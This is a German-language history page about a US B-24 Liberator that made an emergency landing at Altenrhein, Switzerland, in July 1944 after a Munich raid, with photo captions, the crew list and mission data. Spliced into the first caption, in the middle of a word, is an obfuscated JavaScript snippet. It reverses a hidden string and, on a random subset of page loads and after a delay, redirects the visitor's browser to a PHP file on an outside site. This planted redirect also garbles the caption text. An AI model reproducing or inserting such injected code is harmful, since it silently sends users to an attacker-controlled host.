Ereignisse

Führungsmaschine

Der Bomber mit dem Kennzeichen EC-X ist nach einem Einsatz über München in Altenrhein gelandet. Am 20.10.1945 nach Burtonwood zurück gekehrt.

Da der Flugplatz Altenrhein für die L<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung nicht ausreichte, zog es der Pilot vor, das Bugrad einzuziehen und den Rumpfbug als zusätzliche Bremse zu benützen. (155_1)“ width=“800″ height=“224″ /> Da der Flugplatz Altenrhein für die Landung nicht ausreichte, zog es der Pilot vor, das Bugrad einzuziehen und den Rumpfbug als zusätzliche Bremse zu benützen. (155_1)

Der Bomber der 8th Air Force, 392nd Bomb Group mit dem Kennzeichen EC-X ist nach einem Einsatz über München in Altenrhein gelandet und am 20.10.1945 nach Burtonwood zurück gekehrt. 1Lt George L. Bridson flog diese Führungsmaschine und hatte deswegen auch zwei Navigatoren an Bord. 1Lt Ralph L. White und 1Lt Santo Italia. Über dem Ziel mussten die Motoren Nummer 1 und 2 stillgelegt werden, da sie von der Flak getroffen wurden. Auch bei dieser Maschine wurde bei der Landung in Altenrhein die Nase zerstört. Am 7. September 1944 wurde die B-24 nach Dübendorf überflogen.

Motor Nummer Eins wurde von einer olivefarbenen Maschine übernommen, das Bugrad repariert und die Maschine war bereit für den Überflug. (155_2)

Motor Nummer Eins wurde von einer olivefarbenen Maschine übernommen, das Bugrad repariert und die Maschine war bereit für den Überflug. (155_2)

Rechts Copilot Wachtmeister Schraner, links der Pilot Oberst Högger. Im Hintergrund die 42-95033. (155_3)

Rechts Copilot Wachtmeister Schraner, links der Pilot Oberst Högger. Im Hintergrund die 42-95033. (155_3)

Hintere Reihe: James B. Seery - Waist Gunner, Jacob A. Stafford - Waist Gunner, Umberto Paolucci - Radio Operator, Blaine Ashcraft - Engineer, George Powers - Ball Turret, G. Tatelbaum (nicht in die Schweiz geflogen). Vordere Reihe: William W. Willemin -  Bombardier, James A. Green - Co-Pilot, George L. Bridson - Pilot, Ralph L. White - Navigator. (155_4)

Hintere Reihe: James B. Seery – Waist Gunner, Jacob A. Stafford – Waist Gunner, Umberto Paolucci – Radio Operator, Blaine Ashcraft – Engineer, George Powers – Ball Turret, G. Tatelbaum (nicht in die Schweiz geflogen). Vordere Reihe: William W. Willemin – Bombardier, James A. Green – Co-Pilot, George L. Bridson – Pilot, Ralph L. White – Navigator. (155_4)


Ereignissdatum 11.7.1944
Ort Altenrhein
Kanton SG
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 H-25-FO
Einteilung 8th Air Force, 392nd Bomb Group, 578 Squadron
Basis Wendling (GB)
Auftrag Bombardierung
Einsatzziel München (D)
Rückkehr 20.10.1945 Rückkehr nach Burtonwood (GB)
Werknummer 42-95033
Kennzeichen EC-X
CH Archiv Nr. A088
US MACR Nr. 7497
Besatzung Pilot: George L. Bridson, 1st Lt
Copilot: James A. Green, 2nd Lt
Navigator: Ralph L. White, 1st Lt
Bombardier: William W. Willemin, Jr., 2nd Lt
Nose Gunner: Santo Italia, 1st Lt
Engineer: Blaine Ashcraft, T/Sgt
Radio: Umberto Paolucci, Sgt
Waist Gunner: Jacob A. Stafford, Sgt
Waist Gunner: James B. Seery, S/Sgt
Tail Gunner: George Powers, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer